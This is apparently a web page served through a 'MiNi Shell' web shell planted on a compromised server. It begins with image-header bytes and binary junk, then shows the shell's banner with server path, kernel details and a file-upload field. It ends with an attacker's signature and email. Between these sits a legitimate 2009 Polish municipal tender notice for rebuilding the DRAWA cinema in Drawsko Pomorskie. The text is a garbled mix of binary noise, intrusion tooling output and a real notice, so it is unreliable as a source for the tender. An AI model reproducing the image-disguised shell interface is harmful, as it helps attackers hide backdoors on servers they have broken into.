JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091021/184265-N-2009.html

<p class="kh_header"><b>Drawsko Pomorskie: Rozbudowa kina DRAWA na Centrum Kultury w Drawsku Pomorskim</b><br>
<b>Numer ogłoszenia: 184265 - 2009; data zamieszczenia: 21.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Drawsko Pomorskie , ul. Gen. W. Sikorskiego 41, 78-500 Drawsko Pomorskie, woj. zachodniopomorskie, tel. 094 36334-85 do 7, faks 094 363-31-13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.drawsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa kina DRAWA na Centrum Kultury w Drawsku Pomorskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest rozbudowa i przebudowa kina Drawa na Centrum Kultury w Drawsku Pomorskim wraz z przyłączami:

1.	Roboty branży budowlanej
Roboty branży budowlanej polegają między innymi na;
1.	rozbiórce budynku gospodarczego,
2.	rozbiórce części ścian, stropów, schodów drewnianych w istniejących obiektach,
3.	przebudowie istniejących obiektów,
4.	dobudowie nowych obiektów o konstrukcji słupowo - ryglowej, ze schodami i stropami żelbetowymi,
5.	robotach wykończeniowych w dobudowanym i przebudowanym obiekcie,
6.	wyposażeniu obiektu wg wskazanych rozwiązań w projekcie budowlanym,
7.	zagospodarowaniu terenu.

2.	Roboty branży wodno - kanalizacyjnej
Roboty branży wodno - kanalizacyjnej polegają na rozbiórce  i wykonaniu między innymi nowych instalacji;
1.	wodno - kanalizacyjnych (instalacja wodociągowa dla potrzeb socjalnych i p - pożarowych, instalacje kanalizacji sanitarnej i deszczowej),
2.	gazu na potrzeby kotłowni gazowej,
3.	grzewczych centralnego ogrzewania i zasilania nagrzewnic wentylacyjnych zasilana z kotłowni gazowej,
4.	wentylacji mechanicznej nawiewno - wywiewnej i wywiewnej,
5.	chłodniczej dla obsługi układu wentylacji widowni i sceny oraz pomieszczeń technicznych,
6.	sieci kanalizacji sanitarnej dn 160mm znajdującej sie na terenie skweru miejskiego,
7.	sieci kanalizacji deszczowej dn 250 istniejącej na działce nr 259,
8.	sieci wodociągowej dn 110 PCV znajdującej sie na terenie działki inwestycji.

3.	Roboty branży elektrycznej
Roboty branży elektrycznej polegają na wykonaniu między innymi;
1.	zasilania budynku ze złącza SZK-3+PP (zlokalizowanego przy budynku),
2.	instalacji elektrycznej wewnętrznej;
a)	rozdzielnicy głównej oraz piętrowych,
b)	zasilanie obwodów administracyjnych (jak kotłownia, klimatyzacja, wentylacja, itp.),
c)	instalacji elektrycznych odbiorczych gniazd ogólnych,
d)	zasilanie do tablic sterowniczych instalacji nie ujętych opracowaniem
(jak instalacje: PPOŻ, ochrony mienia oraz serwera i centrali telefonicznej),
e)	oświetlenia normalnego w obiekcie i na elewacji obiektu,
f)	oświetlenia awaryjnego,
g)	ochrony przepięciowej,
h)	ochrony przeciwporażeniowej,
i)	instalacji odgromowej budynku.

4.	System zabezpieczenia
Projekt obejmuje swym zakresem zabezpieczenie kina Drawa systemem sygnalizacji włamania oraz kontroli dostępu dla wybranych przejść.

5.	Instalacja teleinformatyczna
Instalacja teleinformatyczna wykonana na bazie nieekranowanego okablowania strukturalnego kategorii 6. (elementy transmisyjne pochodzące z oferty jednego producenta) obejmująca 24 podwójne gniazda RJ-45.

6.	System nagłośnieniowy i multimedialny
System nagłośnieniowy i multimedialny w pomieszczeniach foyer przebudowywanego kina, pomieszczeń wystawowych i kawiarni znajdujących się na parterze, oraz sali baletowej znajdującej się na pierwszym piętrze obiektu obejmuje;
1.	wykonanie okablowania instalacji głośnikowej i video w pomieszczeniu kawiarni, sali wystawowej, foyer i sali baletowej,
2.	wykonanie instalacji pętli indukcyjnej,
3.	montaż głośników sufitowych w w/w pomieszczeniach,
4.	montaż urządzeń źródłowych nagłośnienia i wizualizacji,
5.	montaż urządzeń wzmacniająco - miksujących,
6.	montaż telewizorów w kawiarni, foyer i sali baletowej,
7.	montaż niezbędnych szaf instalacyjnych,
8.	podłączenie, uruchomienie i właściwe wysterowanie w/w systemów.

7.	System projekcji
Wykonanie systemu technologii projekcji kinowej oraz nagłośnienia kinowego DD wraz z pętlą indukcyjną, które zostaną wykonane w ramach przebudowy obiektu.

8.	System mechaniki sceny
Wykonanie systemów technologii mechaniki sceny, okotarowania, oświetlenia
scenicznego, nagłośnienia scenicznego i technologii inspicjenta, które to zostaną wykonane w ramach przebudowy obiektu.

9.	Parametry techniczne obiektu
1.	Powierzchnia działek 260/1, 260/2, 261/1, 261/2 - 2280,00 m2
2.	Suma całkowitej powierzchni użytkowej 1682,84 m2
3.	Kubatura całości 6996,00 m3
4.	Całkowita powierzchnia zabudowy 1167,00 m2
5.	Istniejąca przebudowywana powierzchnia zabudowy 648,00 m2
6.	Nawierzchnia utwardzona istniejąca do przełożenia 135,00 m2
7.	Nawierzchnia utwardzona projektowana 260,00 m2
8.	Powierzchnia zielona (trawniki) istniejące 715,00 m2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.10.00.00-8, 45.30.00.00-0, 45.40.00.00-1, 45.10.00.00-3, 45.31.22.00-9, 32.00.00.00-3, 32.42.00.00-3, 38.65.20.00-0, 31.52.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 200000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	posiadać uprawnienia do wykonywania działalności lub czynności oraz nie podlegać wykluczeniu na podstawie art. 24 u.p.z.p.,
2)	posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.              
W szczególności Wykonawca musi spełniać następujące warunki                  (w przypadku  wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie):
a)	wykonał w okresie ostatnich 5 lat, przed dniem wszczęcia postępowania,        a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwie roboty budowlane, których przedmiotem są obiekty użyteczności publicznej określone w Klasyfikacji Środków Trwałych w podgrupie 10 rodzaj 101 - 103, 105, 107, 109 i w podgrupie 11 rodzaj 110,  o wartości każdej z nich co najmniej 4 mln złotych brutto,
b)	wskaże do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia,  niezbędnych do wykonania zamówienia,       a także zakresu wykonywania przez nich czynności:
- kierownik budowy ma posiadać przygotowanie zawodowe do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń na podstawie przepisów ustawy z dnia        7 lipca 1994 r. - Prawo budowlane oraz pięcioletnie doświadczenie przy pracach tego rodzaju,
- kierownik robót z uprawnieniami budowlanymi bez ograniczeń              w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych                             i kanalizacyjnych na podstawie przepisów ustawy z dnia 7 lipca 1994 r. - Prawo budowlane ma posiadać pięcioletnie doświadczenie przy pracach tego rodzaju,
- kierownik robót z uprawnieniami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych na podstawie przepisów ustawy z dnia 7 lipca 1994 r. - Prawo budowlane ma posiadać pięcioletnie doświadczenie przy pracach tego rodzaju,
3)	znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku):
a)	posiadać środki finansowe w wysokości co najmniej 1 mln PLN lub posiadać zdolność kredytową w wysokości co najmniej 2 mln PLN.  
b)	posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości co najmniej 5 mln PLN. W.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
2)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
3)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym    w art. 24 ust. 1 pkt 4 - 8 u.p.z.p., wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
4)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym    w art. 24 ust. 1 pkt 9 u.p.z.p., wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się  o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
5) wykaz wykonanych robót budowlanych sporządzony według wzoru stanowiącego załącznik nr 4 do niniejszej IDW oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie.
6) wykaz sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej IDW oraz dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia tj. stwierdzenie przygotowania zawodowego, zaświadczenie okręgowej izby inżynierów budownictwa;
7) przedłożyć informację z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, w którym posiadają rachunek, potwierdzające posiadanie środków finansowych w wymaganej wysokości lub posiadanie przez Wykonawcę zdolności kredytowej w wymaganej  wysokości,
8) złożyć polisę a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.drawsko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski
ul. Gen. W. Sikorskiego 41
78-500 Drawsko Pomorskie
pok. nr 212.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2009 godzina 11:45, miejsce: Urząd Miejski
ul. Gen. W. Sikorskiego 41
78-500 Drawsko Pomorskie
pok. nr 210.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com